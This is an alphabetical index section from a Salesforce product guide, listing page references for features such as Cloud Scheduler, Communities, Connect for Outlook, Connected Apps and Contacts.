Cloud Scheduler

adding and removing invitees 1078

Cloud Scheduler (continued)
canceling a requested meeting 1076
confirming a requested meeting 1074
demo 1068
enabling in the partner portal 1476
overview 1068
requesting a meeting 1070
rescheduling a meeting 1077
setting up 1532
setup 1532
tips for letting Salesforce propose meeting times 1073
tips for proposing meeting times 1072

Code
security 3620

Collaboration 2318
Collapsible sections

customizing 256
Collapsible Sidebar

Hiding 45
Showing 45

Column chart
dashboard component 2779

Command line
configuration file (Data Loader) 524
encrypted password (Data Loader) 523
encryption key (Data Loader) 522
field mapping file (Data Loader) 524
importing data (Data Loader) 526
introduction (Data Loader) 521
prerequisites (Data Loader) 522

command-line 3538
command-line window 3749
Comments

cases 1668
communities

feed search 2557
global search 2557
search 2557
sidebar search 2557

Communities
about 2465, 2538
adding Site.com pages to tabs 3310
branding 2551
branding Site.com pages 3298–3300, 3302–3303
Chatter tab 2550
creating 2545
creating users 2540
customizing 2546
customizing with Site.com 3296–3297
default roles 2544
determining the URL of Site.com pages 3309
displaying current user information on Site.com pages 3307
displaying current user information onSite.com pages 3308
email 2553
enabling 2539
Force.com Sites 3278
global header 2466
Ideas 2027
implementation guide 164, 2564
limits 3941
login 2552
members 2548
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Communities (continued)
navigating to 2466
publishing 2555
settings 2543
sharing personal contact information 2467
Site.com 3278
Site.com authorization 3304
statuses 2547
super user access 2543–2544
tabs 2549
taking offline 2556
tips for using Site.com 3296
who can see what 2557

Communities users
creating 2540

Community
assigning to answers 2025

Community app 2033
community request parameter 633
Community users

delegating administration 2542
Company information

editing 181
fields 181
language setting 181

Company message
adding 2827

Competitors
adding and editing 1140
deleting 1142
fields 1141
overview 1139

Conference calls
making 1720

Configuring
workflow actions 3119
workflow rules 3117

Confirming meetings 1074
Connect for Lotus Notes

checking for updates 12
tip sheet for administrators 163
tip sheet for users 162

Connect for Office
checking for updates 12
Excel integration 2734
installing 2735
mail merge templates 1278
system requirements 1280
tip sheet 162

Connect for Outlook
access 1378
adding emails 1355
adding outgoing emails 1355
adding received emails to Salesforce 1357
adding sent emails to Salesforce 1357
associating activities with Outlook Items 1363
associating contacts with Outlook Items 1363
associating emails with Salesforce records 1359
associating events with Outlook Items 1363
associating Outlook items with Salesforce records 1360
associating tasks with Outlook Items 1363
checking for updates 12

Connect for Outlook (continued)
compared with Salesforce for Outlook 1299
creating cases 1362
deploying 1351, 1643
increase search results 1378
installing 1350
looking up accounts 1360
mapping custom fields 1376
opening Salesforce records 1367
overview 1349
reports to contact 1363
resolving data conflicts 1366
Salesforce address book 1354
setting options 1369
sync profiles 1368
syncing 1363
system requirements 1351
tip sheet for administrators 163
tip sheet for users 162
using 1353
viewing Salesforce tabs 1367
working with Person accounts 1366

Connect Offline
activating briefcase configurations 1382
assigning users and profiles to briefcase configurations 1383
changing your briefcase account selection 1389
checking for updates 12
creating briefcase configurations 1383
deactivating briefcase configurations 1382
default briefcase contents 1388
defining data sets 1384
deploying 1646
emptying your briefcase 1390
home tab 1392
installing 1646
licensing 1646
managing briefcase configurations 1382
manually adding and removing accounts 1387
overview 1380
running 1381
sample data sets 1647
synchronizing 1381
synchronizing your briefcase 1390
system requirements 1646
tabs 1392
tip sheet 162
troubleshooting 1394
updating 1381
working with 1392

Connected App
access contro in 3720
access control in 3720
create 3715
creating 3716
deleting 3719
details 3720
editing 3719–3720
IP restrictions for 3720
managing 3720
monitoring usage 3722
packaging 3719 3986
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Connected App (continued)
start URL 3720
uninstalling 3722

Connection Finder
setting up 1243

Connections
about 1221
accepting records 1230
assigning records 1236
automatically accepting records 1232
connection templates 1223–1224
deleting 1222
editing 1222
forwarding related records 1239
managing 1222

Connector element 3256
Console

See Service Cloud console 1887
tip sheet 162
viewing 1909

Console tab
about 1887
assigning layouts 2139
choosing related objects 2137
concepts 1887
creating layouts 2134
customizing layouts 2135
defining mini page layouts 2138
deleting layouts 2135
displaying 1890
list view 1891
managing layouts 2136
navigating 1889
setting up 2133

Constant 3258
Consumers

See Person accounts 755
Contact

fields searched 100
information, Chatter 138

Contact history 807
Contact Manager

overview 5
Contact roles

creating 826
fields 828
overview 825
viewing and editing 827

contacts
adding from Data.com 869

Contacts
adding as leads from Data.com 871
adding from Data.com 848
adding from the Data.com tab 868
adding translated contact names 784
assigning accounts to synced 1330
assigning to accounts automatically 1324
assigning to emails 1271
assigning to synced Outlook events 1331
assigning to synced Outlook tasks 1332
associating with an account 868
changing ownership 785

Contacts (continued)
cleaning with Data.com 805
cloning 810
contact history 807
contacts related to a task, viewing in reports 1028
contacts related to an event, viewing in reports 1028
creating 810
defining sync filters for Salesforce for Outlook 1636
deleting 824
details 806
displaying 806
displaying and editing 805
Do Not Call checkbox 1420
duplicates with Salesforce for Outlook, removing 1345
editing 806
Email Opt Out checkbox 1420
emails, adding from Outlook 1335
emails, removing from Salesforce records 1336
enabling Customer Portal 1405, 1977
enabling Self-Service 809
events, relating multiple contacts to 1525
excluding from syncing with Salesforce for Outlook 1316
fields 812
finding and adding from Data.com 805
finding related content 2445
getting Data.com contacts from an account 870
home page 803
importing, permissions 529
limits 3910–3911
merging 818
merging contacts 820
overview 802
page layouts 808
portal users 805, 811, 820
primary contacts 1025
quick create 803
related list on entitlements 1812
related lists 808
relating to events 1025
relating to tasks 1025
renaming 2804
reports 2624
Salesforce to Salesforce 1225
searching 821
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searching for YouTube videos 921
searching Outlook 1337
Shared Activities feature, enabling the 1525
Shared Activities, viewing in reports 1028
sharing 821
Social Accounts and Contacts 746, 802, 914
syncing with Salesforce for Outlook 1316
tasks, relating multiple contacts to 1525
transfer between accounts 805
unresolved 1330
updating campaign history 950
using Social Accounts and Contacts 917
viewing from Contacts tab 804
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viewing YouTube videos 920 3987
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Contacts to Activities, Relating 1079
Content
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Importing (continued)
campaign import file 547
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